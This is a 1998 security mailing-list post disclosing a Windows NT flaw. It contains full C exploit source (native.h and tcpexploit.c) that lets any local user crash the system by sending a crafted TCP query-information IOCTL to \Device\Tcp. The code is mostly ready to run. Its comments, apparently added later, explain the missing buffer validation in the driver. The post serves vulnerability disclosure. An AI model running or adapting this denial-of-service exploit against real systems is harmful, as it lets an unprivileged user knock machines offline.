Crashing NT with Native Calls
Luigi Mori (lm at SYMBOLIC.IT), Wed, 23 Sep 1998 16:16:31 +0000
Hi,
Playing with TCPIP.SYS I've noticed that any user can crash the
system just by calling the undocumented function NtDeviceIoControlFile with
a handle to TCPIP and the "right" parameters.
This is the exploit:
--------------- begin native.h --------------------------
#ifndef gigi_native_h
#define gigi_native_h
/*
 * Caller-side status block handed to NtDeviceIoControlFile as its
 * IoStatusBlock argument (see tcp_query_information), plus the event the
 * call signals on completion.  'bo' and 'result' presumably line up with
 * the Status/Information members of IO_STATUS_BLOCK -- confirm against
 * ntddk.h before relying on that; nothing in this file reads them.
 */
typedef struct {
unsigned int bo;
unsigned int result;
HANDLE hevent;
} nt_overlapped;
/*
 * Decodes as CTL_CODE(FILE_DEVICE_NETWORK, 0, METHOD_NEITHER, FILE_ANY_ACCESS).
 * METHOD_NEITHER means the driver receives the raw user-mode buffer pointers
 * and lengths and must probe and validate them itself; FILE_ANY_ACCESS means
 * any open handle to the device may issue it.  Together these are what make
 * an unvalidated request reachable from an unprivileged process.
 */
#define IOCTL_TCP_QUERY_INFORMATION 0x120003
#endif /* gigi_native_h */
-------------- end native.h ----------------------------
-------------- begin tcpexploit.c ------------------------
#include <ntddk.h>
#include <stdio.h>
#include <tdiinfo.h>
#include "native.h"
#define MAX_NAME_LEN 256
/*
 * Process-wide state: the handle to \Device\Tcp opened by open_tcp and the
 * output buffer that main hands to tcp_query_information for the driver to
 * write into.
 */
struct {
HANDLE h_tcp;
char buff[0x400];
} g;
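/*
 * Open a handle to \Device\Tcp into g.h_tcp.
 *
 * Returns 1 on success, 0 on failure (after printing the NTSTATUS and the
 * Status word of the I/O status block).
 *
 * The access mask 0x20000000 (GENERIC_EXECUTE) requests neither read nor
 * write rights; since the IOCTL issued later is FILE_ANY_ACCESS, this
 * minimal handle is all that is needed to reach the driver's code path.
 */
unsigned int
open_tcp()
{
    OBJECT_ATTRIBUTES object_attrs;
    UNICODE_STRING device_tcp;
    IO_STATUS_BLOCK io_status_block = {0};
    NTSTATUS status;

    /* RtlInitUnicodeString points device_tcp.Buffer at the literal itself,
     * so the original's separate WCHAR scratch buffer (whose address was
     * assigned to Buffer with the wrong pointer type and then overwritten)
     * is not needed. */
    RtlInitUnicodeString(&device_tcp, L"\\Device\\Tcp");
    InitializeObjectAttributes(&object_attrs, &device_tcp,
                               OBJ_CASE_INSENSITIVE, NULL, NULL);

    status = ZwCreateFile(&g.h_tcp, 0x20000000, &object_attrs,
                          &io_status_block, 0,
                          FILE_ATTRIBUTE_NORMAL,
                          FILE_SHARE_READ | FILE_SHARE_WRITE,
                          FILE_OPEN_IF,
                          0, NULL, 0);
    if (status != STATUS_SUCCESS) {
        /* Print the Status member explicitly: the original passed the whole
         * IO_STATUS_BLOCK struct to %#x, which is undefined behaviour. */
        printf("ZwCreateFile error %#x %#x\n", (unsigned int)status,
               (unsigned int)io_status_block.Status);
        return 0;
    }
    return 1;
}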
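/*
 * Close the \Device\Tcp handle opened by open_tcp.
 *
 * g.h_tcp is reset to NULL afterwards so that a repeated call, or a later
 * use of the stale value, cannot act on a handle number that the kernel may
 * have recycled for another object.
 */
void
close_tcp()
{
    ZwClose(g.h_tcp);
    g.h_tcp = NULL;
}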
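/*
 * Issue IOCTL_TCP_QUERY_INFORMATION on g.h_tcp with caller-supplied input
 * and output buffers, using a freshly created event as the completion
 * object.
 *
 * in_buff/in_buff_len     request buffer and the length reported for it
 * out_buff/out_buff_len   buffer the driver writes its answer into
 *
 * Returns 0 if the event could not be created, 1 otherwise.  The NTSTATUS
 * from NtDeviceIoControlFile is printed but deliberately not acted upon, as
 * in the original.  According to the post, the system crash occurs inside
 * the kernel during this call; the driver presumably trusts the request
 * length and contents without validating them (METHOD_NEITHER leaves all
 * probing to the driver), and that validation is the check a fix needs.
 */
unsigned int
tcp_query_information(void *in_buff, unsigned int in_buff_len,
                      void *out_buff, unsigned int out_buff_len)
{
    NTSTATUS status;
    nt_overlapped prova;

    /* 0x1F003 is the desired-access mask as posted; it looks like a typo
     * for EVENT_ALL_ACCESS (0x1F0003) -- confirm before changing it. */
    status = NtCreateEvent(&prova.hevent, 0x1F003, 0, 1, NULL);
    if (status != STATUS_SUCCESS) {
        /* The original format string "0x#x" contained no conversion, so the
         * status argument was never printed. */
        printf("NtCreateEvent error %#x\n", (unsigned int)status);
        return 0;
    }

    status = NtDeviceIoControlFile(g.h_tcp, prova.hevent, 0, 0,
                                   &prova,
                                   IOCTL_TCP_QUERY_INFORMATION,
                                   in_buff, in_buff_len,
                                   out_buff, out_buff_len);
    ZwClose(prova.hevent);
    printf("%#X\n", (unsigned int)status);
    return 1;
}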
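/*
 * Entry point: open \Device\Tcp, send a single query-information request
 * whose ID fields are set as below, print the resulting NTSTATUS, and close
 * the handle.
 *
 * in_buff is zero-initialised so that any part of the 0x24 bytes sent that
 * the ID fields do not cover is deterministic rather than stack garbage.
 * The handle is closed on every path once open_tcp has succeeded; the
 * original leaked it when event creation failed.
 */
void __cdecl
main()
{
    struct tcp_request_query_information_ex in_buff = {0};

    if (!open_tcp()) {
        return;
    }

    in_buff.ID.toi_entity.tei_entity = CO_TL_ENTITY;
    in_buff.ID.toi_entity.tei_instance = 0;
    in_buff.ID.toi_class = INFO_CLASS_PROTOCOL;
    in_buff.ID.toi_type = INFO_TYPE_CONNECTION;
    in_buff.ID.toi_id = 0x5;

    /* 0x24 is the request length as posted; it is kept literal rather than
     * replaced with sizeof in_buff so the bytes handed to the driver are
     * unchanged.  The return value only tells us whether the IOCTL was
     * attempted, so the handle is closed regardless. */
    tcp_query_information(&in_buff, 0x24, g.buff, sizeof(g.buff));
    close_tcp();
}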
----------------- end tcpexploit.c ---------------------------------
Luigi Mori --
Symbolic (http://www.symbolic.it)
Now Nuclear Free !!!